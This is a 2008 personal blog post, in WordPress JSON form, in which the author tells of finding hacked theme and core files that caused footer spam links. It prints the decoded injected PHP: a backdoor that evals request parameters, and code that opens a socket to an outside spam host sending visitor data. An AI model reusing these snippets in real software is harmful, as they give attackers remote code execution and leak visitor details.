{"id":1063,"date":"2008-08-23T23:44:25","date_gmt":"2008-08-24T04:44:25","guid":{"rendered":"http:\/\/www.fortunecookiechronicles.com\/blog\/?p=1063"},"modified":"2008-10-16T17:14:41","modified_gmt":"2008-10-16T22:14:41","slug":"i-was-hacked-with-wordpress-footer-spam-but-now-am-saved","status":"publish","type":"post","link":"http:\/\/www.fortunecookiechronicles.com\/blog\/2008\/08\/23\/i-was-hacked-with-wordpress-footer-spam-but-now-am-saved\/","title":{"rendered":"I was hacked (with WordPress footer Spam) but now am saved"},"content":{"rendered":"

In poking around my blog because of layout issues, we discovered I had a bunch of spam links in my footer. Like a hundred links to latech.edu, with horrible things like cialis and viagra. About a month ago, I started noticing some very strange search queries bringing people to my site, like “pantyhose” and things I can’t write here (sexual acts, anatomy, and fluids and stuff) to my blog. I was perplexed. I didn’t use these terms. What was going on.<\/p>\n

So today, it all became clear. Turned out I had been hacked, perhaps it had to do with some WordPress vulerability.\u00c2\u00a0 I felt really violated.<\/p>\n

<\/p>\n

Anyway, in my templates. I went and looked in my header.php file on WordPress I was horrified to find something that started with this<\/p>\n

<?php eval(base64_decode(“aWYoQCRfUkVRVUVTVFsiQSJdID09ICJiIiBhbmQ…<\/p>\n

Which is a “code” for normal text. Decoded it became this:<\/p>\n

if(@$_REQUEST[“A”] == “b” and isset($_REQUEST[“C”])) eval(stripslashes(stripslashes($_REQUEST[“C”])));<\/p>\n

Which totally was sketchy. I also found anther one, which I couldn’t decompress by myself<\/p>\n

<?eval(gzuncompress(base64_decode(‘eJx1kMFqwzAMhl\/FE2bEEJz0NmZCF6hp…<\/p>\n

That came to this:<\/p>\n

$path=”\/blog”;@$s = fsockopen (“pub.supercyborg.info<\/a>“,80);fputs($s,
\n“GET \/c\/check.php?ua=”.urlencode($_<\/p>\n

SERVER[“HTTP_USER_AGENT”]).”&ra=”.urlencode($_SERVER[“REMOTE_ADDR”]).”&sn=”.urlencode($_SERVER[“SERVER_NAME”]).”&path=”.urlencode($path).”
\nHTTP\/1.0\\\\nHost: pub.supercyborg.info<\/a>\\\\n\\\\n”);while(!feof($s))
\n$o.=fgets($s,1000);$o=split(“\\\\r?\\\\n\\\\r?\\\\n”,$o);echo
\n$o[1];fclose($s);’<\/div>\n

I removed these and the spam was still there! And also, I switched out theme, and it was still there. So it had to be in the WordPress files.<\/p>\n

And we had just done a WordPress upgrade so all of the files had been recently updated — so we couldn’t look at timestamps to figure out which files had been touched. But you could do a search for the base64 phrase. It turned out that some of the WordPress files themselves had been infected, like wp-functions.php<\/a> And then another one of my files template-functions-comments.php was the one with all the bad things in it.<\/p>\n

(blah). But luckily I have adorable high-quality tech help which purged it for me. I’m eternally grateful!<\/p>\n","protected":false},"excerpt":{"rendered":"

In poking around my blog because of layout issues, we discovered I had a bunch of spam links in my footer. Like a hundred links to latech.edu, with horrible things like cialis and viagra. About a month ago, I started noticing some very strange search queries bringing people to my site, like “pantyhose” and things […]<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[28,8],"tags":[],"class_list":["post-1063","post","type-post","status-publish","format-standard","hentry","category-blogging-musings","category-chinese-food"],"jetpack_featured_media_url":"","jetpack_shortlink":"https:\/\/wp.me\/p2pydS-h9","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"http:\/\/www.fortunecookiechronicles.com\/blog\/wp-json\/wp\/v2\/posts\/1063","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.fortunecookiechronicles.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.fortunecookiechronicles.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.fortunecookiechronicles.com\/blog\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.fortunecookiechronicles.com\/blog\/wp-json\/wp\/v2\/comments?post=1063"}],"version-history":[{"count":14,"href":"http:\/\/www.fortunecookiechronicles.com\/blog\/wp-json\/wp\/v2\/posts\/1063\/revisions"}],"predecessor-version":[{"id":1078,"href":"http:\/\/www.fortunecookiechronicles.com\/blog\/wp-json\/wp\/v2\/posts\/1063\/revisions\/1078"}],"wp:attachment":[{"href":"http:\/\/www.fortunecookiechronicles.com\/blog\/wp-json\/wp\/v2\/media?parent=1063"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.fortunecookiechronicles.com\/blog\/wp-json\/wp\/v2\/categories?post=1063"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.fortunecookiechronicles.com\/blog\/wp-json\/wp\/v2\/tags?post=1063"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}